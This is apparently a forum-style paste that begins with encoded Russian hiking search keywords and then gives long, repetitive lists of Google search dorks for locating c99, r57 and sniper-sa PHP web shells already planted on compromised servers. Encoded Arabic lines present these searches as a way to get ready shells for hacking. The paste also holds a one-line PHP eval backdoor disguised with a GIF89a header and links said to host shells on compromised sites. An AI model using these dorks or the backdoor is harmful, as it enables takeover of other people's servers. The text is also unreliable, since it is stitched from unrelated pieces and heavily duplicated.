  544. &#1083;&#1099;&#1078;&#1085;&#1099;&#1077; &#1082;&#1088;&#1077;&#1087;&#1083;&#1077;&#1085;&#1080;&#1103; &#1076;&#1083;&#1103; &#1079;&#1080;&#1084;&#1085;&#1080;&#1093; &#1087;&#1086;&#1093;&#1086;&#1076;&#1086;&#1074;
  545. &#1086;&#1076;&#1077;&#1078;&#1076;&#1072; &#1076;&#1083;&#1103; &#1074;&#1077;&#1083;&#1086;&#1090;&#1091;&#1088;&#1080;&#1079;&#1084;&#1072;
  546. &#1086;&#1089;&#1090;&#1088;&#1086;&#1074;
  547. &#1087;&#1077;&#1096;&#1080;&#1077; &#1090;&#1091;&#1088;&#1099; &#1087;&#1086; &#1075;&#1086;&#1088;&#1085;&#1086;&#1084;&#1091; &#1072;&#1083;&#1090;&#1072;&#1102; &#1087;&#1086;&#1087;&#1091;&#1090;&#1095;&#1080;&#1082;&#1080;
  548. &#1087;&#1086;&#1080;&#1089;&#1082; &#1087;&#1086;&#1087;&#1091;&#1090;&#1095;&#1080;&#1082;&#1080; &#1085;&#1072; &#1072;&#1083;&#1090;&#1072;&#1081; &#1075;&#1086;&#1088;&#1085;&#1099;&#1081; 2008
  549. &#1087;&#1086;&#1087;&#1091;&#1090;&#1095;&#1080;&#1082; &#1080; &#1085;&#1072; &#1072;&#1083;&#1090;&#1072;&#1081;
  550. &#1087;&#1086;&#1093;&#1086;&#1076; &#1040;&#1083;&#1090;&#1072;&#1081;
  551. &#1087;&#1086;&#1093;&#1086;&#1076; &#1085;&#1072; &#1040;&#1083;&#1090;&#1072;&#1081;
  552. &#1087;&#1086;&#1093;&#1086;&#1076; &#1085;&#1072; &#1072;&#1083;&#1090;&#1072;&#1081;
  553. &#1087;&#1088;&#1086;&#1089;&#1090;&#1099;&#1077; &#1080;&#1079;&#1086;&#1073;&#1088;&#1077;&#1090;&#1077;&#1085;&#1080;&#1103;
  554. &#1089;. &#1090;&#1086;&#1087;&#1086;&#1083;&#1100;&#1085;&#1086;&#1077; &#1091;&#1089;&#1090;&#1100;-&#1082;&#1072;&#1085;
  555. &#1089;&#1072;&#1084;&#1099;&#1077; &#1082;&#1088;&#1072;&#1089;&#1080;&#1074;&#1099;&#1077; &#1084;&#1077;&#1089;&#1090;&#1072; &#1074; &#1061;&#1072;&#1082;&#1072;&#1089;&#1080;&#1080;
  556. &#1089;&#1085;&#1072;&#1088;&#1103;&#1078;&#1077;&#1085;&#1080;&#1077; &#1076;&#1083;&#1103; &#1074;&#1077;&#1083;&#1086;&#1087;&#1086;&#1093;&#1086;&#1076;&#1072;
  557. &#1089;&#1087;&#1080;&#1089;&#1086;&#1082; &#1089;&#1085;&#1072;&#1088;&#1103;&#1078;&#1077;&#1085;&#1080;&#1103; &#1074; &#1087;&#1086;&#1093;&#1086;&#1076;
  558. &#1089;&#1091;&#1083;&#1086;&#1077;&#1074;
  559. &#1090;&#1091;&#1088; &#1089; &#1059;&#1089;&#1090;&#1100; &#1050;&#1072;&#1085;&#1072; &#1076;&#1086; &#1052;&#1091;&#1083;&#1100;&#1090;&#1080;&#1085;&#1089;&#1082;&#1080;&#1093; &#1086;&#1079;&#1077;&#1088;
  560. &#1090;&#1091;&#1088; &#1089;. &#1059;&#1089;&#1090;&#1100; -&#1050;&#1086;&#1082;&#1089; -&#1052;&#1091;&#1083;&#1100;&#1090;&#1080;&#1085;&#1089;&#1082;&#1080;&#1077; &#1086;&#1079;&#1077;&#1088;&#1072;
  561. &#1090;&#1091;&#1088;&#1080;&#1079;&#1084; &#1102;&#1084;&#1086;&#1088; &#1087;&#1086;&#1093;&#1086;&#1076; &#1088;&#1102;&#1082;&#1079;&#1072;&#1082; &#1089;&#1087;&#1072;&#1083;&#1100;&#1085;&#1080;&#1082;
  562. &#1095;&#1090;&#1086; &#1085;&#1077;&#1086;&#1073;&#1093;&#1086;&#1076;&#1080;&#1084;&#1086; &#1074;&#1079;&#1103;&#1090;&#1100; &#1089; &#1089;&#1086;&#1073;&#1086;&#1081; &#1074; &#1087;&#1086;&#1093;&#1086;&#1076;
  563. &#1095;&#1090;&#1086; &#1085;&#1091;&#1078;&#1085;&#1086; &#1074;&#1079;&#1103;&#1090;&#1100; &#1089; &#1089;&#1086;&#1073;&#1086;&#1081; &#1074; &#1087;&#1086;&#1093;&#1086;&#1076;
  564. &#1101;&#1088;&#1086;&#1090;&#1080;&#1082;&#1072;
  565. &#1102;&#1084;&#1086;&#1088; &#1089;&#1087;&#1083;&#1072;&#1074; &#1087;&#1086;&#1093;&#1086;&#1076;
  566.  
  567.  
  568.  
  569.  
  570.  
  571.  
  572.  
  573.  
  574.  
  575. ===============================
  576.  
  577.  
  578.  
  579.  
  580.  
  581.  
  582.  
  583.  
  584.  
  585. ================================
  586.  
  587.  
  588.   inurl:c99.php
  589.   inurl:c99.php uid=0(root)
  590.   root c99.php
  591.   "Captain Crunch Security Team" inurl:c99
  592.   download c99.php
  593.   download c99.php
  594.   download c99.php
  595.   inurl:c99.php
  596.   inurl:c99.php
  597.   allinurl: c99.php
  598.   inurl:c99.php
  599.   allinurl: c99.php
  600.   inurl: /c99.php"
  601.  allinurl: c99.php
  602.  inurl:c99.php
  603.  inurl:"c99.php" c99shell
  604.  
  605. ====================================================
  606.  
  607. safe-mode: off (not secure) drwxrwxrwx c99shell
  608. inurl:c99.php
  609. inurl:c99.php uid=0(root)
  610. root c99.php
  611. "Captain Crunch Security Team" inurl:c99
  612. download c99.php
  613. download c99.php
  614. download c99.php
  615. inurl:c99.php
  616. inurl:c99.php
  617. allinurl: c99.php
  618. inurl:c99.php
  619. allinurl: c99.php
  620. inurl:"/c99.php"
  621. allinurl: c99.php
  622. inurl:c99.php
  623. inurl:"c99.php" c99shell
  624. inurl:c99.php uid=0(root)
  625. c99shell powered by admin
  626. c99shell powered by admin
  627. inurl:"/c99.php"
  628. inurl:c99.php
  629. inurl:c99.php
  630. inurl:c99.php
  631. c99 shell v.1.0 (roots)
  632. inurl:c99.php
  633. allintitle: "c99shell"
  634. inurl:"c99.php
  635. inurl:"c99.php
  636. allinurl: "c99.php"
  637. inurl:c99.php
  638. intitle:C99Shell v. 1.0 pre-release +uname
  639. intitle:C99Shell v. 1.0 pre-release +uname
  640. allinurl: "c99.php"
  641. inurl:c99.php
  642. inurl:"c99.php"
  643. inurl:"c99.php"
  644. inurl:c99.php
  645. inurl:c99.php
  646. inurl:c99.php
  647. inurl:c99.php
  648. inurl:"c99.php" c99shell
  649. inurl:c99.php
  650. inurl:"c99.php"
  651. allinurl:c99.php
  652. inurl:"/c99.php
  653. inurl:c99.php?
  654. inurl:/c99.php+uname
  655. allinurl:"c99.php"
  656. allinurl:c99.php
  657. inurl:"c99.php"
  658. inurl:"c99.php"
  659. allinurl:c99.php
  660. allinurl:c99.php?
  661. allinurl:c99.php?
  662. allinurl:c99.php?
  663. "inurl:c99..php"
  664. allinurl:c99.php
  665. c99shell [file on secure ok ]?
  666. inurl:c99.php
  667. inurl:c99.php
  668. inurl:c99.php
  669. inurl:c99.php
  670. inurl:c99.php
  671. inurl:c99.php
  672. inurl:c99.php
  673. inurl:c99.php
  674. powered by Captain Crunch Security Team
  675. allinurl:c99.php
  676. "c99.php" filetype:php
  677. allinurl:c99.php
  678. inurl:c99.php
  679. allinurl:.c99.php
  680. "inurl:c99.php"
  681. c99. PHP-code Feedback Self remove
  682. allinurl:c99.php
  683. download c99.php
  684. allinurl:c99.php
  685. inurl:c99.php
  686. allinurl: "c99.php"
  687. allinurl:c99.php
  688. allinurl:c99.php
  689. c99shell
  690. inurl:c99.php
  691. inurl:c99.php
  692. intitle:C99Shell v. 1.0 pre-release +uname
  693. allinurl:"c99.php"
  694. inurl:c99.php
  695. inurl:c99.php
  696. inurl:c99.php
  697. inurl:c99.php
  698. safe-mode: off (not secure) drwxrwxrwx c99shell
  699. inurl:/c99.php
  700. inurl:"c99.php"
  701. inurl:c99.php
  702. inurl:c99.php
  703. c99.php download
  704. inurl:c99.php
  705. inurl:"c99.php"
  706. inurl:/c99.php
  707. inurl:"c99.php?"
  708. inurl:c99.php
  709. inurl:c99.php
  710. files/c99.php
  711. c99shell filetype:php -echo
  712. c99shell powered by admin
  713. inurl:c99.php
  714. inurl:c99.php
  715. inurl:"c99.php"
  716. inurl:c99.php uid=0(root)
  717. allinurl:c99.php
  718. inurl:"c99.php"
  719. inurl:"c99.php"
  720. inurl:"/c99.php" intitle:"C99shell"
  721. inurl:"/c99.php" intitle:"C99shell"
  722. inurl:"/c99.php" intitle:"C99shell"
  723. C99Shell v. 1.0 pre-release build #5
  724. inurl:c99.php
  725. inurl:c99.php
  726. --[ c99shell v. 1.0 pre-release build #16
  727. c99shell linux infong
  728. c99shell linux infong
  729. C99Shell v. 1.0 pre-release build
  730. !C99Shell v. 1.0 beta!
  731. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  732. !c99shell v. 1+Safe-mode: OFF (not secure)
  733. "C99Shell v. 1.0 pre-release build "
  734. intitle:c99shell +filetype:php
  735. inurl:c99.php
  736. intitle:C99Shell v. 1.0 pre-release +uname
  737. "Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  738. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  739. intitle:!C99Shell v. 1.0 pre-release build #16! root
  740. !C99Shell v. 1.0 pre-release build #5!
  741. inurl:"c99.php"
  742. C99Shell v. 1.0 pre-release build #16!
  743. c99shell v. 1.0 pre-release build #16
  744. intitle:c99shell intext:uname
  745. allintext:C99Shell v. 1.0 pre-release build #12
  746. c99shell v. 1.0 pre-release build #16
  747. --[ c99shell v. 1.0 pre-release build #15 | Powered by ]--
  748. allinurl: "c99.php"
  749. allinurl: "c99.php"
  750. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  751. "c99shell v 1.0"
  752. ftp apache inurl:c99.php
  753. c99shell+v.+1.0 16
  754. C99Shell v. 1.0 pre-release build #16 download
  755. intitle:c99shell "Software: Apache"
  756. allinurl: c99.php
  757. allintext: Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  758. powered by Captain Crunch Security Team
  759. powered by Captain Crunch Security Team
  760. !C99Shell v. 1.0 pre-release build #5!
  761. c99shell v. 1.0 release security
  762. c99shell v. 1.0 pre-release build
  763. inurl:c99.php
  764. c99shell [file on secure ok ]?
  765. C99Shell v. 1.3
  766. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  767. inurl:c99.php uid=0(root)
  768. powered by Captain Crunch Security Team
  769. C99Shell v. 1.0 pre-release build #16
  770. c99shell[on file]ok
  771. c99shell[file on ]ok
  772. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  773. inurl:c99.php
  774. "C99Shell v. 1.0 pre"
  775. =C99Shell v. 1.0 pre-release
  776. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  777. c99shell v. pre-release build
  778. inurl:c99.php c99 shell
  779. inurl:c99.php c99 shell
  780. powered by Captain Crunch Security Team
  781. inurl:c99.php
  782. inurl:c99.php
  783. !C99Shell v. 1.0 pre-release build #5!
  784. intitle:"c99shell" filetype:php root
  785. intitle:"c99shell" Linux infong 2.4
  786. C99Shell v. 1.0 beta !
  787. C99Shell v. 1.0 pre-release build #
  788. inurl:"c99.php"
  789. allintext:C99Shell v. 1.0 pre-release build #12
  790. "C99Shell v. 1.0 pre"
  791. powered by Captain Crunch Security Team
  792. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  793. inurl:/c99.php?
  794. allinurl:c99.php
  795. intitle:C99Shell pre-release
  796. inurl:"c99.php"
  797. powered by Captain Crunch Security Team
  798. inurl:c99.php
  799. C99Shell v. 1.0 pre-release build #16!
  800. allinurl:c99.php
  801. C99Shell v. 1.0 pre-release build #16 administrator
  802. intitle:c99shell filetype:php
  803. powered by Captain Crunch Security Team
  804. powered by Captain Crunch Security Team
  805. C99Shell v. 1.0 pre-release build #12
  806. c99shell v.1.0
  807. allinurl:c99.php
  808. "c99shell v. 1.0 pre-release build"
  809. inurl:"c99.php" filetype:php
  810. "c99shell v. 1.0 "
  811. ok c99.php
  812. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  813. c99shell v. 1.0 pre-release build #16 |
  814. !C99Shell v. 1.0 pre-release build #5!
  815. !C99Shell v. 1.0 pre-release build #5!
  816. allinurl:/c99.php
  817. powered by Captain Crunch Security Team
  818. inurl:c99.php
  819. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  820. inurl:c99.php
  821. powered by Captain Crunch Security Team
  822. inurl:c99.php
  823. C99Shell v. 1.0 pre-release
  824. inurl:c99.php
  825. inurl:c99.php ext:php
  826. inurl:"c99.php"
  827. allinurl:"c99.php"
  828. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  829. powered by Captain Crunch Security Team
  830. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  831. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout"
  832. C99Shell v. 1.0 pre-release build #16 software apache
  833. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  834. "c99shell v 1.0"
  835. inurl:"c99.php"
  836. allintitle: C99shell filetype:php
  837. C99Shell v. 1.0 pre-release build #16!
  838. "c99shell v. 1.0 pre-release"
  839. c99shell v. 1.0 pre-release build #5
  840. allinurl:"c99.php" filetype:php
  841. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  842. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  843. !C99Shell v. 1.0 pre-release build #16!
  844. inurl:c99.php
  845. intitle:C99Shell v. 1.0 pre-release +uname
  846. inurl:c99.php
  847. c99shell v. 1.0
  848. allinurl: c99.php
  849. --[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]--
  850. inurl:"/c99.php"
  851. c99shell +uname
  852. c99shell php + uname
  853. c99shell php + uname
  854. --[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]--
  855. allinurl:c99.php
  856. !C99Shell v. 1.0 pre-release build #5!
  857. C99Shell v.1.0 pre-release
  858. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  859. inurl:c99.php
  860. intitle:c99shell filetype:php
  861. "Encoder Tools Proc. FTP brute"
  862. "c99" filetype:php intext:"Safe-Mode: OFF"
  863. c99shell v. 1.0 pre
  864. inurl:c99.php
  865. intitle:c99shell uname -bbpress
  866. intitle:"index.of" c99.php
  867. inurl:admin/files/
  868. intitle:"index of /" "c99.php"
  869. intitle:"index of" intext:c99.php
  870. intitle:index.of c99.php
  871. intitle:"index of" + c99.php
  872. intitle:index/of file c99.php
  873. intitle:index/of file c99.php
  874. index of /admin/files/
  875. intitle:"Index of/"+c99.php
  876. c99.php "intitle:Index of "
  877. c99.php "intitle:Index of "
  878. c99.php "intitle:Index of "
  879. intitle:index.of c99.php
  880. img/c99.php
  881. intitle:index.of c99.php
  882. img.c99.php
  883. intitle:"Index of/"+c99.php
  884. "index of /" c99.php
  885. c99.php
  886. intitle:"Index of" c99.php
  887. "index of" c99.php
  888. "Index of/"+c99.php
  889.  
  890. ===========================================================
  891.  
  892. &#1575;&#1581;&#1590;&#1575;&#1585; &#1588;&#1604;&#1575;&#1578; &#1580;&#1575;&#1607;&#1586;&#1577; &#1605;&#1585;&#1601;&#1608;&#1593;&#1577; &#1576;&#1589;&#1610;&#1594;&#1577; &#1578;&#1603;&#1587;&#1578; &#1604;&#1578;&#1587;&#1578;&#1582;&#1583;&#1605;&#1607;&#1575; &#1601;&#1609; &#1579;&#1594;&#1585;&#1575;&#1578; &#1575;&#1604;&#1601;&#1575;&#1610;&#1604; &#1575;&#1606;&#1603;&#1604;&#1608;&#1583;
  893. &#1575;&#1603;&#1578;&#1576; &#1601;&#1609; &#1575;&#1609; &#1580;&#1608;&#1580;&#1604; &#1575;&#1604;&#1575;&#1578;&#1609;:
  894.  
  895. inurl:c99.txt?
  896. &#1575;&#1608;
  897. inurl:r57.txt?
  898. &#1575;&#1608;
  899. inurl:sniper-sa.txt?
  900.  
  901. =====
  902.  
  903. &#1604;&#1575;&#1581;&#1590;&#1575;&#1585; &#1588;&#1604;&#1575;&#1578; &#1580;&#1575;&#1607;&#1586;&#1577; &#1604;&#1604;&#1575;&#1582;&#1578;&#1585;&#1575;&#1602;
  904. &#1575;&#1603;&#1578;&#1576; &#1601;&#1609; &#1580;&#1608;&#1580;&#1604;
  905.  
  906. inurl:c99+uname
  907.  
  908. inurl:r57+uname
  909.  
  910. inurl:sniper-sa+uname
  911.  
  912.  
  913. ===========================
  914.  
  915.  
  916. c99shell
  917.  
  918. C99SHELL
  919.  
  920. c99shell /=(5)
  921.  
  922. - c99shell [ ok ]
  923.  
  924. --[ c99shell modded by . 2 ]--
  925.  
  926.  
  927. C99Shell
  928.  
  929. c99shell modded by
  930.  
  931. c99shell modded by w4ck1ng
  932.  
  933. c99shell modded by w4ck1ng. | w4ck1ng-shell
  934.  
  935. c99shell=[ok]
  936.  
  937. tr index php c99shell
  938.  
  939. w4ck1ng c99shell
  940.  
  941. ================================================
  942. http://w7ed.by.ru/c99.txt
  943.  
  944.  
  945. ===============================================
  946.  
  947.  
  948. uid=99(nobody) gid=99(nobody) groups=99(nobody). Safe-mode: OFF (not secure)
  949.  
  950. =============================================
  951.  
  952.  
  953.  
  954. RAR!
  955. Gif89a
  956. <?php @eval($_POST[cmd])?>
  957.  
  958. ---------
  959.  
  960. gif89a.php
  961.  
  962. ---------
  963.  
  964. :: Create folder :: Create file :: Read file if safe mode is Off ::"; if($os=="unix"){ print "PS table ::"; }
  965.  
  966. ========================================================
  967.  
  968.  
  969. Safe Mode OFF (?)
  970.  
  971. http://aquafitness.gr/~willboar/c100.php
  972.  
  973. http://www.iyi.gen.tr/admin/c99 ...
  974.  
  975. http://www.google.com.mx/search?
  976. hl=es&q=inurl:r57.php&start=80&sa=N jajaja :o
  977.  
  978. ============================================================
  979.  
  980. [HIDE] inurl:c99.php
  981. inurl:c99.php uid=0(root)
  982. root c99.php
  983. "Captain Crunch Security Team" inurl:c99
  984. download c99.php
  985. download c99.php
  986. download c99.php
  987. inurl:c99.php
  988. inurl:c99.php
  989. allinurl: c99.php
  990. inurl:c99.php
  991. allinurl: c99.php
  992. inurl:"/c99.php"
  993. allinurl: c99.php
  994. inurl:c99.php
  995. inurl:"c99.php" c99shell
  996. inurl:c99.php uid=0(root)
  997. c99shell powered by admin
  998. c99shell powered by admin
  999. inurl:"/c99.php"
  1000. inurl:c99.php
  1001. inurl:c99.php
  1002. inurl:c99.php
  1003. c99 shell v.1.0 (roots)
  1004. inurl:c99.php
  1005. allintitle: "c99shell"
  1006. inurl:"c99.php
  1007. inurl:"c99.php
  1008. allinurl: "c99.php"
  1009. inurl:c99.php
  1010. intitle:C99Shell v. 1.0 pre-release +uname
  1011. intitle:C99Shell v. 1.0 pre-release +uname
  1012. allinurl: "c99.php"
  1013. inurl:c99.php
  1014. inurl:"c99.php"
  1015. inurl:"c99.php"
  1016. inurl:c99.php
  1017. inurl:c99.php
  1018. inurl:c99.php
  1019. inurl:c99.php
  1020. inurl:"c99.php" c99shell
  1021. inurl:c99.php
  1022. inurl:"c99.php"
  1023. allinurl:c99.php
  1024. inurl:"/c99.php
  1025. inurl:c99.php?
  1026. inurl:/c99.php+uname
  1027. allinurl:"c99.php"
  1028. allinurl:c99.php
  1029. inurl:"c99.php"
  1030. inurl:"c99.php"
  1031. allinurl:c99.php
  1032. allinurl:c99.php?
  1033. allinurl:c99.php?
  1034. allinurl:c99.php?
  1035. "inurl:c99..php"
  1036. allinurl:c99.php
  1037. c99shell [file on secure ok ]?
  1038. inurl:c99.php
  1039. inurl:c99.php
  1040. inurl:c99.php
  1041. inurl:c99.php
  1042. inurl:c99.php
  1043. inurl:c99.php
  1044. inurl:c99.php
  1045. inurl:c99.php
  1046. powered by Captain Crunch Security Team
  1047. allinurl:c99.php
  1048. "c99.php" filetype:php
  1049. allinurl:c99.php
  1050. inurl:c99.php
  1051. allinurl:.c99.php
  1052. "inurl:c99.php"
  1053. c99. PHP-code Feedback Self remove
  1054. allinurl:c99.php
  1055. download c99.php
  1056. allinurl:c99.php
  1057. inurl:c99.php
  1058. allinurl: "c99.php"
  1059. allinurl:c99.php
  1060. allinurl:c99.php
  1061. c99shell
  1062. inurl:c99.php
  1063. inurl:c99.php
  1064. intitle:C99Shell v. 1.0 pre-release +uname
  1065. allinurl:"c99.php"
  1066. inurl:c99.php
  1067. inurl:c99.php
  1068. inurl:c99.php
  1069. inurl:c99.php
  1070. safe-mode: off (not secure) drwxrwxrwx c99shell
  1071. inurl:/c99.php
  1072. inurl:"c99.php"
  1073. inurl:c99.php
  1074. inurl:c99.php
  1075. c99.php download
  1076. inurl:c99.php
  1077. inurl:"c99.php"
  1078. inurl:/c99.php
  1079. inurl:"c99.php?"
  1080. inurl:c99.php
  1081. inurl:c99.php
  1082. files/c99.php
  1083. c99shell filetype:php -echo
  1084. c99shell powered by admin
  1085. inurl:c99.php
  1086. inurl:c99.php
  1087. inurl:"c99.php"
  1088. inurl:c99.php uid=0(root)
  1089. allinurl:c99.php
  1090. inurl:"c99.php"
  1091. inurl:"c99.php"
  1092. inurl:"/c99.php" intitle:"C99shell"
  1093. inurl:"/c99.php" intitle:"C99shell"
  1094. inurl:"/c99.php" intitle:"C99shell"
  1095. C99Shell v. 1.0 pre-release build #5
  1096. inurl:c99.php
  1097. inurl:c99.php
  1098. --[ c99shell v. 1.0 pre-release build #16
  1099. c99shell linux infong
  1100. c99shell linux infong
  1101. C99Shell v. 1.0 pre-release build
  1102. !C99Shell v. 1.0 beta!
  1103. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1104. !c99shell v. 1+Safe-mode: OFF (not secure)
  1105. "C99Shell v. 1.0 pre-release build "
  1106. intitle:c99shell +filetype:php
  1107. inurl:c99.php
  1108. intitle:C99Shell v. 1.0 pre-release +uname
  1109. "Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1110. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1111. intitle:!C99Shell v. 1.0 pre-release build #16! root
  1112. !C99Shell v. 1.0 pre-release build #5!
  1113. inurl:"c99.php"
  1114. C99Shell v. 1.0 pre-release build #16!
  1115. c99shell v. 1.0 pre-release build #16
  1116. intitle:c99shell intext:uname
  1117. allintext:C99Shell v. 1.0 pre-release build #12
  1118. c99shell v. 1.0 pre-release build #16
  1119. --[ c99shell v. 1.0 pre-release build #15 | Powered by ]--
  1120. allinurl: "c99.php"
  1121. allinurl: "c99.php"
  1122. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1123. "c99shell v 1.0"
  1124. ftp apache inurl:c99.php
  1125. c99shell+v.+1.0 16
  1126. C99Shell v. 1.0 pre-release build #16 download
  1127. intitle:c99shell "Software: Apache"
  1128. allinurl: c99.php
  1129. allintext: Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1130. powered by Captain Crunch Security Team
  1131. powered by Captain Crunch Security Team
  1132. !C99Shell v. 1.0 pre-release build #5!
  1133. c99shell v. 1.0 release security
  1134. c99shell v. 1.0 pre-release build
  1135. inurl:c99.php
  1136. c99shell [file on secure ok ]?
  1137. C99Shell v. 1.3
  1138. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1139. inurl:c99.php uid=0(root)
  1140. powered by Captain Crunch Security Team
  1141. C99Shell v. 1.0 pre-release build #16
  1142. c99shell[on file]ok
  1143. c99shell[file on ]ok
  1144. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1145. inurl:c99.php
  1146. "C99Shell v. 1.0 pre"
  1147. =C99Shell v. 1.0 pre-release
  1148. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1149. c99shell v. pre-release build
  1150. inurl:c99.php c99 shell
  1151. inurl:c99.php c99 shell
  1152. powered by Captain Crunch Security Team
  1153. inurl:c99.php
  1154. inurl:c99.php
  1155. !C99Shell v. 1.0 pre-release build #5!
  1156. intitle:"c99shell" filetype:php root
  1157. intitle:"c99shell" Linux infong 2.4
  1158. C99Shell v. 1.0 beta !
  1159. C99Shell v. 1.0 pre-release build #
  1160. inurl:"c99.php"
  1161. allintext:C99Shell v. 1.0 pre-release build #12
  1162. "C99Shell v. 1.0 pre"
  1163. powered by Captain Crunch Security Team
  1164. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1165. inurl:/c99.php?
  1166. allinurl:c99.php
  1167. intitle:C99Shell pre-release
  1168. inurl:"c99.php"
  1169. powered by Captain Crunch Security Team
  1170. inurl:c99.php
  1171. C99Shell v. 1.0 pre-release build #16!
  1172. allinurl:c99.php
  1173. C99Shell v. 1.0 pre-release build #16 administrator
  1174. intitle:c99shell filetype:php
  1175. powered by Captain Crunch Security Team
  1176. powered by Captain Crunch Security Team
  1177. C99Shell v. 1.0 pre-release build #12
  1178. c99shell v.1.0
  1179. allinurl:c99.php
  1180. "c99shell v. 1.0 pre-release build"
  1181. inurl:"c99.php" filetype:php
  1182. "c99shell v. 1.0 "
  1183. ok c99.php
  1184. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1185. c99shell v. 1.0 pre-release build #16 |
  1186. !C99Shell v. 1.0 pre-release build #5!
  1187. !C99Shell v. 1.0 pre-release build #5!
  1188. allinurl:/c99.php
  1189. powered by Captain Crunch Security Team
  1190. inurl:c99.php
  1191. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1192. inurl:c99.php
  1193. powered by Captain Crunch Security Team
  1194. inurl:c99.php
  1195. C99Shell v. 1.0 pre-release
  1196. inurl:c99.php
  1197. inurl:c99.php ext:php
  1198. inurl:"c99.php"
  1199. allinurl:"c99.php"
  1200. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1201. powered by Captain Crunch Security Team
  1202. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1203. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout"
  1204. C99Shell v. 1.0 pre-release build #16 software apache
  1205. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1206. "c99shell v 1.0"
  1207. inurl:"c99.php"
  1208. allintitle: C99shell filetype:php
  1209. C99Shell v. 1.0 pre-release build #16!
  1210. "c99shell v. 1.0 pre-release"
  1211. c99shell v. 1.0 pre-release build #5
  1212. allinurl:"c99.php" filetype:php
  1213. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1214. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1215. !C99Shell v. 1.0 pre-release build #16!
  1216. inurl:c99.php
  1217. intitle:C99Shell v. 1.0 pre-release +uname
  1218. inurl:c99.php
  1219. c99shell v. 1.0
  1220. allinurl: c99.php
  1221. --[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]--
  1222. inurl:"/c99.php"
  1223. c99shell +uname
  1224. c99shell php + uname
  1225. c99shell php + uname
  1226. --[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]--
  1227. allinurl:c99.php
  1228. !C99Shell v. 1.0 pre-release build #5!
  1229. C99Shell v.1.0 pre-release
  1230. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1231. inurl:c99.php
  1232. intitle:c99shell filetype:php
  1233. "Encoder Tools Proc. FTP brute"
  1234. "c99" filetype:php intext:"Safe-Mode: OFF"
  1235. c99shell v. 1.0 pre
  1236. inurl:c99.php
  1237. intitle:c99shell uname -bbpress
  1238. intitle:"index.of" c99.php
  1239. inurl:admin/files/
  1240. intitle:"index of /" "c99.php"
  1241. intitle:"index of" intext:c99.php
  1242. intitle:index.of c99.php
  1243. intitle:"index of" + c99.php
  1244. intitle:index/of file c99.php
  1245. intitle:index/of file c99.php
  1246. index of /admin/files/
  1247. intitle:"Index of/"+c99.php
  1248. c99.php "intitle:Index of "
  1249. c99.php "intitle:Index of "
  1250. c99.php "intitle:Index of "
  1251. intitle:index.of c99.php
  1252. img/c99.php
  1253. intitle:index.of c99.php
  1254. img.c99.php
  1255. intitle:"Index of/"+c99.php
  1256. "index of /" c99.php
  1257. c99.php
  1258. intitle:"Index of" c99.php
  1259. "index of" c99.php
  1260. "Index of/"+c99.php[/hide]
  1261.  
  1262.  
  1263. Shell Dork
  1264.  
  1265. =============================================================
  1266.  
  1267.  
  1268.  
  1269. Shell Dork
  1270.  
  1271. inurl:"c99.php" inurl:c99.php inurl:c99.php inurl:c99.php allinurl:c99.php inurl:"c99.php" inurl:c99.php intitle:c99shell uname c99shell v.1.0 (roots) inurl:/c99.php allinurl:.c99.php allinurl:.c99.php intitle:C99Shell allintitle:"C99Shell" allintitle:"C99Shell" c99.php ccteam.ru c99.php
  1272. intext:c99shell inurl:c99.php
  1273. !C99Shell v. 1.0 pre-release build #16!
  1274. intitle:c99shell filetype:php
  1275. intitle:c99shell filetype:php
  1276. inurl:c99.php
  1277. inurl:c99.php
  1278. inurl:c99.php
  1279. inurl:c99.php
